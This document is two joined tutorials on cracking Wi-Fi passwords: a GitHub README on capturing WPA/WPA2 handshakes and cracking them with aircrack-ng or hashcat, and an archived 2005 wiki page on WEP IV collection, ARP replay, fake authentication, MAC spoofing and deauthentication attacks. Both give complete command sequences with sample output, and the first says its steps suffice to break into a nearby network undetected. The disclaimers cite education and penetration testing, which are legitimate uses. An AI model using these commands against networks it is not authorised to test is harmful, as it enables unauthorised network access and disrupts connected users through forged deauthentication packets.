wifi-cracking

Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat.

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the end of this document.

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at the bottom. For a variety of suggestions and alternative methods, see the appendix. neal1991 and tiiime have also graciously provided translations to this document and the appendix in Chinese if you prefer those versions.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.

 Getting Started

This tutorial assumes that you:

• Have a general comfortability using the command-line
• Are running a debian-based linux distro, preferably Kali linux (OSX users see the appendix)
• Have Aircrack-ng installed
  • sudo apt-get install aircrack-ng
• Have a wireless card that supports monitor mode (see here for a list of supported devices)

 Cracking a Wi-Fi Network

 Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode 😞

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

 Find Your Target

Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

 Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.

# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.

Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

 Crack the Network Password

The final step is to crack the password using the captured handshake. If you have access to a GPU, I highlyrecommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

 Cracking With naive-hashcat (recommended)

Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.

cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

 Cracking With Aircrack-ng

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note, that if the network password is not in the wordfile you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

                                 Aircrack-ng 1.2 beta3


                   [00:01:49] 111040 keys tested (1017.96 k/s)


                         KEY FOUND! [ hacktheplanet ]


      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 

 Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.

 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]                                         
                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS                                                         
                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS

Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.

# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticeably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

You can optionally broadcast deauth packets to all connected clients with:

# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

Once you've sent the deauth packets, head back over to your airodump-ng process, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you've captured a handshake you should be ready to crack the network password.

 List of Commands

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng... ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

 Appendix

The response to this tutorial was so great that I've added suggestions and additional material from community members as an appendix. Check it out to learn how to:

• Capture handshakes and crack WPA passwords on MacOS/OSX
• Capture handshakes from every network around you with wlandump-ng
• Use crunch to generate 100+GB wordlists on-the-fly
• Spoof your MAC address with macchanger

A Chinese version of the appendix is also available.

 Attribution

Much of the information presented here was gleaned from Lewis Encarnacion's awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Overwhelming thanks to neal1991 and tiiime for translating this tutorial into Chinese. Further shout outs to yizhiheng, hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp and Shark0der who also provided suggestions and typo fixes on Redditand GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on this Hacker News post.

from github.com/brannondorsey/wifi-cracking

-------------------------------------------------------

 

Cracking WEP and WPA Wireless Networks

Overview

This is a good one, let me tell you! There can be so many issues setting up your box to actually get the tools working and i'm not even touching on that, but if you can get everything to work, you'll be cracking wireless networks like a pro in no time.

Disclaimer: I'm not a pro.

[edit]

Pre-Installation

[edit]

Checklist

• Tools
  • I've been really, really successful with basically one tool set called AirCrack. Download that.
  • Kismet is an excellent tool for sniffing out wireless networks as well and could prove useful.
• An encrypted wireless network.
  • We'll be working on WEP encrypted networks as well as static passkey WPA or WPA-PSK

Note: Make sure you can get your card into monitor mode (sometimes called raw monitor or rfmon). This is VERY important

[edit]

WEP Crackin

[edit]

Theory

A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection. A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.

Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition.

A couple of things will cause us some problems.

• If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key.
• Theres no traffic, therefore no packets - we can fix this.
• MAC Address Filtering - we can fix this too.

[edit]

Setting up your tools

We're gonna need 3 or 4 shells open, we have 5 tools:

• airodump - Grabbing IVs
• aircrack - Cracking the IVs
• airdecap - Decoding captured packets
• airreplay - (My Favourite) Packet injector to attack APs.
• kismet - Network Sniffer, can grab IVs as well.

For a standard WEP hack we'll usally only need airodump, aircrack, and kismet (server and client). If we run into some problems we might have to use airreplay to fiddle about.

I'll leave you to config all these tools up, for the most part they should just be defaults with the exception of kismet.

[edit]

Finding the Network

First step is we need to find a netork to crack. Start up kismet and start sniffing for APs. Leave it on for a bit so that it can discover all the important information about the networks around. What we want from kismet is:

• Encryption type: Is it WEP 64-bit? 128-bit?
• What channel is it on? Can greatly speed up IV collection.
• AP's IP Address
• BSSID
• ESSID

All this info isn't required but the more you have, the more options you have later to crack and sniff. We can get a lot of this from airodump as well but I find the channel is important.

[edit]

Capturing IVs

Alright, we know what we wanna crack, so lets start capturing packets. You can use kismet to capture files but I prefer airodump because it keeps a running count of all the IVs I've captured and I can crack and airodump will automatically update aircrack with new IVs as it finds them.

Note: kimset can interfere with airodump so make sure you close it down before starting airodump.

Airodump is pretty straight forward with its command line looking something like this:

 ./airodump <interface> <output prefix> [channel] [IVs flag]

• interface is your wireless interface to use - required.
• output prefix is just the filname it'll prepend, - required.
• channel is the specific channel we'll scan, leave blank or use 0 to channel hop.
• IVs flag is either 0 or 1, depending on whether you want all packets logged, or just IVs.

My wireless card is ath0, output prefix i'll use "lucid", the channel we sniffed from kismet is 6, and IVs flag is 1 because we just want IVs. So we run:

 ./airodump ath0 lucid 6 1

Airodump will come up with a graph showing us all the APs and their relevant info, as well as client stations connected to any of the APs.

 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
 
 00:23:1F:55:04:BC   76    21995   213416   6  54. WEP   hackme 
 
 BSSID              STATION            PWR  Packets  Probes
 
 00:23:1F:55:04:BC  00:12:5B:4C:23:27  112     8202  hackme
 00:23:1F:55:04:BC  00:12:5B:DA:2F:6A   21     1721  hackme

The second line shows us some info about the AP as well as the number of beacons and data packets we've collected from the AP. The two last lines show us two authenticated clients. Where they are connected to and the packets they are sending. We won't use this client info in a straight theory hack but in practice we'll need this info to actively attack the AP.

This step may take a long time or could be very short. It depends how busy the AP is and how many IVs we are collecting. What we are doing is populating a file "lucid.ivs" with all the IV important packet info. Next, we'll feed this to aircrack. To move onto the next step, we'll want at least 100,000 packets (under # Data in airodump) but probably more.

[edit]

Using IVs to Decrypt the Key

Ok, pretend you have enough IVs now to attempt a crack. Goto a new terminal (without stopping airodump - remember it'll autoupdate as new IVs are found) and we'll start aircrack. It looks something like this:

 ./aircrack [options] <input file>

There are a lot of options so you can look them up yourself, i'll be using common ones here that should get you a crack. Our input file is "lucid.ivs", the options we will use are:

• -a 1 : forces a WEP attack mode (2 forces WPA)
• either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique.
• -n 64 or -n 128 : WEP key length, omit if not known by now.

So our command will look like:

 ./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs

and off it goes, resembling the picture from the top. Keep an eye on the Unique IV count as it should increase if airodump is still running. For all intents and purposes you are done. That'll pop open most old wireless routers with some traffic on them.

[edit]

Anticipated Problems

There are lots of problems that can come up that will make the above fail, or work very slowly.

• No traffic
  • No traffic is being passed, therefore you can't capture any IVs.
  • What we need to do is inject some special packets to trick the AP into broadcasting.
  • Covered below in WEP Attacks
• MAC Address filtering
  • AP is only responding to connected clients. Probably because MAC address filtering is on.
  • Using airodumps screen you can find the MAC address of authenticated users so just change your MAC to theirs and continue on.
  • Using the -m option you can specify aircrack to filter packets by MAC Address, ex. -m 00:12:5B:4C:23:27
• Can't Crack even with tons of IVs
  • Some of the statistical attacks can create false positives and lead you in the wrong direction.
  • Try using -k N (where N=1..17) or -y to vary your attack method.
  • Increase the fudge factor. By default it is at 2, by specifying -f N (where N>=2) will increase your chances of a crack, but take much longer. I find that doubling the previous fudge factor is a nice progression if you are having trouble.
• Still Nothing
  • Find the AP by following the signal strength and ask the admin what the WEP key is.

[edit]

WPA Crackin

[edit]

Differences

WPA is an encryption algorithm that takes care of a lot of the vunerablities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different. A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

[edit]

WPA Flavours

WPA basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.

PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved, for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key but upon the initialization of the TKIP, like during an authentication, we get the password (well the PMK anyways). A robust dictionary attack will take care of a lot of consumer passwords.

Radius involves physical transferring of the key and encrypted channels blah blah blah, look it up to learn more about it but 90% of commerical APs do not support it, it is more of an enterprise solution then a consumer one.

[edit]

The Handshake

The WPA handshake was designed to occur over insecure channels and in plaintext so the password is not actually sent across. There are some fancy dancy algorithms in the background that turn it into a primary master key, PMK, and the like but none of that really matters cause the PMK is enough to connect to the network.

The only step we need to do is capture a full authenication handshake from a real client and the AP. This can prove tricky without some packet injection, but if you are lucky to capture a full handshake, then you can leave and do the rest of the cracking at home.

We can force an authenication handshake by launching a Deauthentication Attack, but only if there is a real client already connected (you can tell in airodump). If there are no connected clients, you're outta luck.

Like for WEP, we want to know the channel the WPA is sitting on, but the airodump command is slightly different. We don't want just IVs so we don't specify an IV flag. This will produce "lucid.cap" instead of "lucid.ivs". Assume WPA is on channel 6 and wireless interface is ath0.

 ./airodump ath0 lucid 6

[edit]

Dictionary Brute Force

The most important part of brute forcing a WPA password is a good dictionary. Check out http://www.openwall.com/wordlists/ for a 'really' good one. It costs money, but its the biggest and best I've ever seen (40 Million words, no duplicates, one .txt file). There is also a free reduced version from the same site but i'm sure resourceful people can figure out where to get a good dictionary from.

When you have a good dictionary the crack is a simple brute force attack:

 ./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist

Either you'll get it or you won't... depends on the strength of the password and if a dictionary attack can crack it.

[edit]

Using Aireplay

Aireplay is the fun part. You get to manipulate packets to trick the network into giving you what you want.

[edit]

WEP Attacks

Attacks used to create more traffic on WEP networks to get more IVs.

[edit]

ARP Injection

ARP Replay is a classic way of getting more IV traffic from the AP. It is the turtle. Slow but steady and almost always works. We need the BSSID of the AP and the BSSID of an associated client. If there are no clients connected, it is possible to create one with another WEP attack explained below: Fake Authentication Attack.

With airodump listening, we attack:

 ./aireplay -3 -b <AP MAC Address> -h <Client MAC Address> ath0

Note: The -3 specifys the type of attack (3=ARP Replay).

This will continue to run, and airodump, listening fron another terminal, will pick up any reply IVs.

[edit]

Interactive Packet Replay

Interactive Packet Reply is quite a bit more advanced and requires capturing packets and constructing your own. It can prove more effective then simple ARP requests but I won't get into packet construction here.

A useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV). Some APs do, some don't.

 aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

[edit]

Fake Authentication Attack

This attack won't generate any more traffic but it does create an associative client MAC Address useful for the above two attacks. Its definately not as good as having a real, connected client, but you gots to do what you gots to do.

This is done easiest with another machine because we need a new MAC address but if you can manually change your MAC then that'll work too. We'll call your new MAC address "Fake MAC".

Now most APs need clients to reassociate every 30 seconds or so or they think they're disconnected. This is pretty arbitrary but I use it and it has worked but if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.

 ./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0

If successful, you should see something like this:

 23:47:29  Sending Authentication Request
 23:47:29  Authentication successful
 23:47:30  Sending Association Request
 23:47:30  Association successful :-)

Awesome! Now you can use the above two attacks even though there were no clients connected in the first place! If it fails, there may be MAC Address Filtering on so if you really want to use this, you'll have to sniff around until a client provides you with a registered MAC to fake.

[edit]

WPA Attacks

So far, the only way to really crack WPA is to force a re-authentication of a valid client. We need a real, actively connected client to break WPA. You might have to wait a while.

[edit]

Deauthentication Attack

This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:

 aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.

[edit]

Conclusion

Well thats that. APs crack fairly often but sometimes there is just nothing you can do. Obviously you are not allowed to illegally crack other people's wireless connections, this is purely for penetration testing purposes and some fun.

--- Bryan Rite 13:57, 24 Nov 2005 (PST)  

 

from  http://web.archive.org/web/20071012231727/http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks